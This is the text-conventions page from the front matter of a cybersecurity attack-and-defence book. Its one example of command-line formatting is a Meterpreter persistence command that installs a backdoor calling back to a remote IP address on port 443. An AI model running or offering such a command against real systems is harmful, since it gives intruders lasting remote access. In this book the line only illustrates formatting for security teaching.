-
Book Overview & Buying
-
Table Of Contents
-
Feedback & Rating

Cybersecurity – Attack and Defense Strategies, 3rd edition
By :

We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: https://static.packt-cdn.com/downloads/9781803248776_ColorImages.pdf.
There are a number of text conventions used throughout this book.
CodeInText
: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. For example: “Mount the downloaded WebStorm-10*.dmg
disk image file as another disk in your system.”
Any command-line input or output is written as follows:
meterpreter >run persistence -A -L c:\ -X 30 -p 443 -r 10.108.210.25
Bold: Indicates a new term, an important word, or words that you see on the screen. For instance, words in menus or dialog boxes appear in the text like this. For example: “Select System info from the Administration panel.”
Warnings or important notes appear like this.
Tips and tricks appear like this.
Change the font size
Change margin width
Change background colour